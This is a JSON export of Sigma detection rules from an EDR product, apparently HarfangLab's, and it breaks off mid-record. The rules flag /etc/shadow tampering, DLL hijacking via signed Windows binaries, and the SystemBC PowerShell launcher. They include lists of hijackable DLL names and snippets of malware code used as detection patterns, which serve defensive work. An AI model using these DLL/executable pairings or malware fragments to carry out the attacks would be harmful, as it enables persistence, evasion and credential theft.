"origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.622141Z", "creation_date": "2026-03-23T11:45:34.622143Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.622148Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md", "https://attack.mitre.org/techniques/T1003/008/", "https://attack.mitre.org/techniques/T1078/" ], "name": "t1003_008_etc_shadow_modified.yml", "content": "title: File /etc/shadow Modified\nid: 06168646-4339-42be-bcf4-a8f6ef23f53d\ndescription: |\n Detects a suspicious attempt to modify /etc/shadow.\n This file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\n It is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2022/11/16\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/shadow'\n - TargetPath: '/etc/shadow'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'chmod'\n - 'chown'\n\n exclusion_common:\n ProcessImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/usr/bin/sudo'\n - '/usr/bin/su'\n - '/usr/sbin/sshd'\n - '/usr/sbin/cron'\n - '/usr/sbin/unix_chkpwd'\n - '*/accountsservice/accounts-daemon'\n - '/usr/bin/passwd'\n - '/usr/sbin/usermod'\n - '/usr/sbin/useradd'\n - '/usr/sbin/userdel'\n - '/usr/bin/chage'\n - '/kaniko/executor'\n - '/usr/sbin/chpasswd'\n - '/bin/chmod'\n - '/bin/adduser'\n - '/usr/bin/podman'\n - '/usr/bin/rootlesskit'\n - '/usr/sbin/pwconv'\n - '/usr/bin/chsh'\n - '/usr/bin/systemd-sysusers'\n - '/usr/lib/gdm3/gdm-session-worker'\n - '/usr/lib/snapd/snap-update-ns'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_containerd:\n ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_busybox_adduser:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|startswith: 'adduser '\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/nix/store/*-docker-containerd-*/bin/containerd'\n\n exclusion_docker2:\n ProcessImage: '*/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_passwd_busybox:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|contains:\n - 'passwd '\n - 'chown '\n - 'chpasswd '\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_buildah1:\n ProcessCommandLine|startswith: 'storage-applyLayer'\n ProcessParentImage: '/usr/bin/buildah'\n\n exclusion_buildah2:\n - ProcessCommandLine|startswith: 'buildah-in-a-user-namespace'\n - ProcessGrandparentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n - ProcessParentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n\n exclusion_salt_minion:\n - ProcessCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessParentCommandLine|startswith:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessGrandparentCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n\n exclusion_snap:\n ProcessImage:\n - '/snap/snapd/??/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/???/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/?????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/??????/usr/lib/snapd/snap-update-ns'\n ProcessCommandLine|startswith: 'snap-update-ns'\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "06168646-4339-42be-bcf4-a8f6ef23f53d", "rule_name": "File /etc/shadow Modified", "rule_description": "Detects a suspicious attempt to modify /etc/shadow.\nThis file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\nIt is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\n", "rule_creation_date": "2022-11-16", "rule_modified_date": "2026-01-21", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1003.008", "attack.t1078" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "063e3a72-3dc5-411b-8f95-7a288514f8e5", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.082122Z", "creation_date": "2026-03-23T11:45:34.082124Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.082129Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_chgport.yml", "content": "title: DLL Hijacking via chgport.exe\nid: 063e3a72-3dc5-411b-8f95-7a288514f8e5\ndescription: |\n Detects potential Windows DLL Hijacking via chgport.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chgport.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "063e3a72-3dc5-411b-8f95-7a288514f8e5", "rule_name": "DLL Hijacking via chgport.exe", "rule_description": "Detects potential Windows DLL Hijacking via chgport.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "065c4be3-1c64-4884-8239-a03e9bd028e7", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.602221Z", "creation_date": "2026-03-23T11:45:34.602224Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.602232Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_wlrmdr.yml", "content": "title: DLL Hijacking via wlrmdr.exe\nid: 065c4be3-1c64-4884-8239-a03e9bd028e7\ndescription: |\n Detects potential Windows DLL Hijacking via wlrmdr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wlrmdr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "065c4be3-1c64-4884-8239-a03e9bd028e7", "rule_name": "DLL Hijacking via wlrmdr.exe", "rule_description": "Detects potential Windows DLL Hijacking via wlrmdr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "06851538-293b-454e-ba25-02a9d4300ca4", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.609078Z", "creation_date": "2026-03-23T11:45:34.609082Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.609090Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c", "https://twitter.com/malmoeb/status/1571985877424816130", "https://attack.mitre.org/techniques/T1059/001/" ], "name": "t1059_001_systembc_powershell_execution.yml", "content": "title: SystemBC PowerShell Execution\nid: 06851538-293b-454e-ba25-02a9d4300ca4\ndescription: |\n Detects the execution of the PowerShell version of SystemBC's launcher.\n SystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\n It is recommended to investigate all the PowerShell commands associated with the process.\n It is also recommended to check the process tree for suspicious activities.\nreferences:\n - https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c\n - https://twitter.com/malmoeb/status/1571985877424816130\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/09/27\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Malware.SystemBC\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - \"For ($*=0; $* -ne 50; $*++) { $*[$*] =* $* }\"\n - '[string]$domain = \"{0}.{1}.{2}.{3}\" -f $a, $b, $c, $d'\n - '[void]$ps.AddParameter(\"Rc4_crypt\", $*)'\n - '[void]$ps.AddParameter(\"xordata_\", $*)'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "06851538-293b-454e-ba25-02a9d4300ca4", "rule_name": "SystemBC PowerShell Execution", "rule_description": "Detects the execution of the PowerShell version of SystemBC's launcher.\nSystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\nIt is recommended to investigate all the PowerShell commands associated with the process.\nIt is also recommended to check the process tree for suspicious activities.\n", "rule_creation_date": "2022-09-27", "rule_modified_date": "2025-02-06", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.execution" ], "rule_technique_tags": [ "attack.t1059.001", "attack.t1071" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "068ce414-d762-41fa-88fd-5e0df21bb756", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.081159Z", "creation_date": "2026-03-23T11:45:34.081161Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.081166Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_chglogon.yml", "content": "title: DLL Hijacking via chglogon.exe\nid: 068ce414-d762-41fa-88fd-5e0df21bb756\ndescription: |\n Detects potential Windows DLL Hijacking via chglogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chglogon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\REGAPI.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "068ce414-d762-41fa-88fd-5e0df21bb756", "rule_name": "DLL Hijacking via chglogon.exe", "rule_description": "Detects potential Windows DLL Hijacking via chglogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "06be143e-b032-4364-923d-de4d6d136dd3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.097139Z", "creation_date": "2026-03-23T11:45:34.097140Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.097145Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/xforcered/WFH", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dsacls.yml", "content": "title: DLL Hijacking via DSACLS.exe\nid: 06be143e-b032-4364-923d-de4d6d136dd3\ndescription: |\n Detects potential Windows DLL Hijacking via DSACLS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DSACLS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "06be143e-b032-4364-923d-de4d6d136dd3", "rule_name": "DLL Hijacking via DSACLS.exe", "rule_description": "Detects potential Windows DLL Hijacking via DSACLS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "06f328a3-6c34-4480-b44a-5ccfa923f899", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.081565Z", "creation_date": "2026-03-23T11:45:34.081567Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.081571Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_gamepanel.yml", "content": "title: DLL Hijacking via gamepanel.exe\nid: 06f328a3-6c34-4480-b44a-5ccfa923f899\ndescription: |\n Detects potential Windows DLL Hijacking via gamepanel.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 